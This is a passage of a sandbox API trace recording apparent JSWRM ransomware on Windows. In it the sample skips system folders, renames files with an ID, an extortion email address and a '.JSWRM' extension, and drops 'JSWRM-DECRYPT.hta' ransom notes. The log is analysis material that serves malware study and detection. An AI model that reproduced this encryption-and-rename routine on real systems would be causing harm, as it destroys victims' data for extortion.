hHeap=0x1e0000) returned 1 [0067.402] CloseHandle (hObject=0x450) returned 1 [0067.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0067.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0067.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0067.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0067.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0067.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0067.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225c30 [0067.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0067.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0067.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225c30 | out: hHeap=0x1e0000) returned 1 [0067.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.404] MoveFileW (lpExistingFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), lpNewFileName="C:\\Logs\\Windows PowerShell.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\windows powershell.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.405] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 0 [0067.405] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.405] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x47384f2, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2=".") returned 1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="..") returned 1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="...") returned 1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="windows") returned -1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="recovery") returned -1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="perflogs") returned -1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="documents and settings") returned 1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="$RECYCLE.BIN") returned 1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="system volume information") returned -1 [0067.405] lstrcmpiW (lpString1="pagefile.sys", lpString2="msocache") returned 1 [0067.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pagefile.sys", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pagefile.sys", cchWideChar=12, lpMultiByteStr=0x345fce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pagefile.sys", lpUsedDefaultChar=0x0) returned 12 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pagefile.sys", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pagefile.sys", cchWideChar=12, lpMultiByteStr=0x345fcb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pagefile.sys", lpUsedDefaultChar=0x0) returned 12 [0067.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345fa04, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0067.406] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.406] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f998 | out: lpFileSize=0x345f998*=10154024244613776) returned 0 [0067.406] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24a1c0 [0067.406] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24a1c0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f9a4, lpOverlapped=0x0 | out: lpBuffer=0x24a1c0, lpNumberOfBytesRead=0x345f9a4*=0x0, lpOverlapped=0x0) returned 0 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: hHeap=0x1e0000) returned 1 [0067.406] CloseHandle (hObject=0xffffffff) returned 1 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0067.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0067.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0067.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237178 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237178 | out: hHeap=0x1e0000) returned 1 [0067.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0067.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.407] MoveFileW (lpExistingFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), lpNewFileName="C:\\pagefile.sys.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\pagefile.sys.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0067.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0067.407] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0067.407] lstrcmpiW (lpString1="PerfLogs", lpString2=".") returned 1 [0067.407] lstrcmpiW (lpString1="PerfLogs", lpString2="..") returned 1 [0067.407] lstrcmpiW (lpString1="PerfLogs", lpString2="...") returned 1 [0067.407] lstrcmpiW (lpString1="PerfLogs", lpString2="windows") returned -1 [0067.407] lstrcmpiW (lpString1="PerfLogs", lpString2="recovery") returned -1 [0067.407] lstrcmpiW (lpString1="PerfLogs", lpString2="perflogs") returned 0 [0067.407] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xfed79c12, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xfed79c12, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2=".") returned 1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="..") returned 1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="...") returned 1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="recovery") returned -1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="perflogs") returned 1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="documents and settings") returned 1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="$RECYCLE.BIN") returned 1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="system volume information") returned -1 [0067.407] lstrcmpiW (lpString1="Program Files", lpString2="msocache") returned 1 [0067.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0067.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0067.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.407] GetFileAttributesW (lpFileName="C:\\Program Files\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\jswrm-decrypt.hta")) returned 0xffffffff [0067.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0067.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c894, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24a1c0 [0067.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24bf90 [0067.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: hHeap=0x1e0000) returned 1 [0067.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0067.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0067.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0067.408] CreateFileW (lpFileName="C:\\Program Files\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0067.408] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.408] WriteFile (in: hFile=0x44c, lpBuffer=0x345c9a8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c974, lpOverlapped=0x0 | out: lpBuffer=0x345c9a8*, lpNumberOfBytesWritten=0x345c974*=0x230c, lpOverlapped=0x0) returned 1 [0067.410] CloseHandle (hObject=0x44c) returned 1 [0067.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0067.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf90 | out: hHeap=0x1e0000) returned 1 [0067.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0067.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0067.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.462] GetFileAttributesW (lpFileName="C:\\Program Files\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\jswrm-decrypt.hta")) returned 0x20 [0067.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0067.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.462] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xfed79c12, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0x1ed63c60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231fc0 [0067.462] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.462] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xfed79c12, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0x1ed63c60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.462] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.462] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.462] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xface31cd, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xface31cd, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0067.462] lstrcmpiW (lpString1="Common Files", lpString2=".") returned 1 [0067.462] lstrcmpiW (lpString1="Common Files", lpString2="..") returned 1 [0067.462] lstrcmpiW (lpString1="Common Files", lpString2="...") returned 1 [0067.462] lstrcmpiW (lpString1="Common Files", lpString2="windows") returned -1 [0067.462] lstrcmpiW (lpString1="Common Files", lpString2="recovery") returned -1 [0067.462] lstrcmpiW (lpString1="Common Files", lpString2="perflogs") returned -1 [0067.462] lstrcmpiW (lpString1="Common Files", lpString2="documents and settings") returned -1 [0067.463] lstrcmpiW (lpString1="Common Files", lpString2="$RECYCLE.BIN") returned 1 [0067.463] lstrcmpiW (lpString1="Common Files", lpString2="system volume information") returned -1 [0067.463] lstrcmpiW (lpString1="Common Files", lpString2="msocache") returned -1 [0067.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0067.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0067.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0067.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0067.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0067.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\jswrm-decrypt.hta")) returned 0xffffffff [0067.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0067.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24a1c0 [0067.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24bf90 [0067.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: hHeap=0x1e0000) returned 1 [0067.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0067.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0067.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0067.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0067.465] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.465] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0067.466] CloseHandle (hObject=0x450) returned 1 [0067.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0067.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf90 | out: hHeap=0x1e0000) returned 1 [0067.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0067.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0067.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0067.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0067.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225c30 [0067.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0067.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\jswrm-decrypt.hta")) returned 0x20 [0067.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225c30 | out: hHeap=0x1e0000) returned 1 [0067.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0067.467] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xface31cd, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0x1edfc584, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName=".", cAlternateFileName="")) returned 0x232140 [0067.467] lstrcmpiW (lpString1=".", lpString2=".") returned 0 